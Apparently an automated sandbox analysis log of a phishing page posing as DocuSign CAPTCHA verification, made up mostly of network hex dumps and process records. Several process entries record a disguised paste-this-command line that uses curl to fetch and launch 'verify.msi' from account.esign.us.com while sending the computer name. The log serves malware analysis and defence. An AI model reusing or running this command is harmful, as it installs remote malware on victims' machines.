                              Data Ascii: PNGIHDR+vPLTEGpLWWW^^^fffnnnaaaxxxsss\\\hhhIII***sss444}}}>>>SSSYYYjjj}}}^^^ @@@ppp```000PPPJ$_/'~>$t9T*5*D4S1N
                              2025-03-21 17:44:30 UTC1220INData Raw: 3f a9 4e bd 8e 03 9d 76 03 40 a9 4e 4f 3b 01 8e 6a 02 90 90 90 a0 a0 a0 cd 99 03 b0 b0 b0 d0 d0 d0 3c a8 54 2f 23 01 35 a6 5c b9 b0 37 4c 81 e9 c5 78 4b ca 4f 59 ea 43 35 f0 71 23 e8 6e 21 b0 32 28 39 18 0a ce 3b 2f 49 15 11 dc 3f 32 75 22 1b 93 2a 21 0f 04 03 3b 11 0d 58 19 14 a2 2e 25 1d 08 07 4b 81 e9 bf 37 2b 49 80 e8 67 1d 17 84 26 1e 2c 0d 0a 48 80 e8 47 80 e8 45 7f e7 46 46 75 87 d0 61 1d 00 00 00 20 74 52 4e 53 00 3a af d9 ef c7 fa ff ff ff f6 90 ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff 6a e6 ff fd 4e 7d ae 0a 00 00 10 da 49 44 41 54 78 01 ec d8 55 62 eb 40 10 45 c1 91 49 37 31 ca 82 30 ec 7f 93 8f 19 43 e3 af aa 35 9c 81 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f a0 99 cd 17 5f c0 72 d6 94 93 5b ae
                              Data Ascii: ?Nv@NO;j<T/#5\7LxKOYC5q#n!2(9;/I?2u"*!;X.%K7+Ig&,HGEFFua tRNS:jN}IDATxUb@EI710C5?_r[
                              2025-03-21 17:44:30 UTC1220INData Raw: 72 38 31 e0 f4 12 38 e3 63 e8 19 7e df 61 6b a9 f6 fb 86 e2 78 90 3f 8b fa ee 1b 0e 4a ee 1b be 96 0c b8 00 c0 cb d0 33 ac 76 68 2f 67 d7 79 fb fa 5a 37 00 a0 1b 59 15 41 91 fc 11 86 c5 ed eb b7 36 75 06 00 eb aa 64 40 34 60 67 e8 19 ba 0e 59 cf f7 c2 04 6e e6 8b f7 a2 fc 00 c3 b2 f7 a2 9c 1d ab d2 01 bd 43 76 86 9e a1 eb 90 f5 7c cf 7d 67 5e 63 45 51 ad 0c c7 df 99 17 7e 31 40 19 7e 86 9e 61 b9 43 9e cb d9 72 df dc 22 4f eb 6b 41 9f 99 df 67 98 55 33 cc 93 07 a5 ef 53 36 ce 00 8a 37 80 8c 99 a1 67 e8 3a e4 3e df 13 52 c6 52 2a 07 8b 9b 28 d6 da 27 a7 48 4a 49 55 8b 8a c5 f1 e8 72 bb e1 f8 b3 22 d6 3c 43 d7 61 45 57 b3 7f b1 73 17 46 0c 03 31 00 04 8b 50 07 3f 94 be 82 66 a6 ee c3 8c 9a c8 c1 bb 1a d6 f0 28 d4 4b 30 7c dc e1 fb ae 78 f8 e5 60 a8 77 68 bf
                              Data Ascii: r818c~akx?J3vh/gyZ7YA6ud@4`gYnCv|}g^cEQ~1@~aCr"OkAgU3S67g:>RR*('HJIUr"<CaEWsF1P?f(K0|x`wh
                              2025-03-21 17:44:30 UTC1220INData Raw: fb 55 6b f9 c1 37 e1 60 5d 3b 43 54 28 75 f8 1b 38 f6 f5 b8 0c 27 0a 06 63 4c 3f 72 c0 f0 83 4c ff 6d 96 f1 76 0d 53 e6 e3 63 36 c6 84 83 0c 07 5c 79 db a6 eb 23 0e f7 45 86 d9 5c 66 fa 94 7b 86 2b 20 0d c6 58 93 d3 b4 1c 49 27 6e 6e 6d b1 49 ed 0c 51 a1 d4 e1 1f 7e 41 74 7c 86 76 3a 88 26 a3 cf 2d 05 bf f3 d3 60 d8 dd 0e dc 8d 57 ff 4e cf 8b ad 7c 38 a7 a9 4d 99 e1 74 4a 97 2c 9d c5 26 7c 74 9e 61 31 23 d7 6b b6 97 a3 ae 9a 3f 86 8f e8 34 71 0b 94 a4 eb 67 08 0a 05 0e e1 bc d7 e3 33 34 38 0b f7 a3 e6 86 d6 bc f3 2f 34 77 d7 66 de cc 30 2b 20 96 61 c0 c7 9f df 22 2f 66 18 35 3f 78 77 f3 ca 73 3d e2 ba 44 31 1d 9f c2 fe b5 72 86 a8 50 e6 50 7e fa 35 c3 46 2d 65 98 39 85 38 b8 aa 69 2f 97 f9 c7 4d b3 32 1f cb ac c4 59 86 0d 3e 7e f9 f5 48 19 8e aa 38 87 54
                              Data Ascii: Uk7`];CT(u8'cL?rLmvSc6\y#E\f{+ XI'nnmIQ~At|v:&-`WN|8MtJ,&|ta1#k?4qg348/4wf0+ a"/f5?xws=D1rPP~5F-e98i/M2Y>~H8T
                              2025-03-21 17:44:30 UTC855INData Raw: 85 ef 9f d1 71 e3 46 bf 3f c9 ce e5 ca 14 08 b7 cb e7 c5 0c f5 28 53 78 03 86 3a 0a 19 e2 b4 c2 d6 c9 50 a0 f0 fe 07 3a 7e 8c 17 fc 95 4d 4c 73 b3 c3 43 7a 9a 24 2f 65 48 3a 14 15 ae c3 90 ef f2 87 c0 31 34 78 b5 a6 42 86 1f bf 92 95 73 1d 3f aa 2c 21 19 f9 51 4a 66 87 ab ec 28 25 bb f8 28 25 ea 0b df 82 75 18 f2 0e 47 cd 32 d4 09 5e 7e 7d 0c 3f 7d b5 42 39 d7 7a 10 13 8f 50 cb 0f 96 73 dc c1 72 22 2b 2a 2c 3c 58 0e 57 dd b8 a8 5d 91 21 e9 61 67 13 1f cb 50 f9 f3 a8 ea 18 82 42 59 39 d7 f1 a3 ed 30 37 98 3b 2a 47 b7 a3 a4 d2 45 99 28 29 91 6e 06 7c 5c 4d 13 86 0e ce dc c4 9b c8 ea 5e c3 79 1c 61 24 ed f0 11 c6 8e 88 fa 70 96 42 51 70 75 0c bf 07 0a c5 e5 5c c7 4f d3 f6 e1 2c 83 b1 8e 0e 45 b5 7d 10 9c fa eb da 2c 38 9b 58 db fe cc 5a 87 c7 bc 65 12 9c 53
                              Data Ascii: qF?(Sx:P:~MLsCz$/eH:14xBs?,!QJf(%(%uG2^~}?}B9zPsr"+*,<XW]!agPBY907;*GE()n|\M^ya$pBQpu\O,E},8XZeS


                              Click to jump to process

                              Click to jump to process

                              • File
                              • Network

                              Click to dive into process behavior distribution

                              Target ID:2
                              Start time:13:44:16
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:3
                              Start time:13:44:22
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:12
                              Start time:13:44:27
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                              Target ID:14
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:15
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:16
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:17
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\curl.exe
                              Wow64 process (32bit):true
                              Commandline:curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
                              Imagebase:0xfb0000
                              File size:470'528 bytes
                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              No disassembly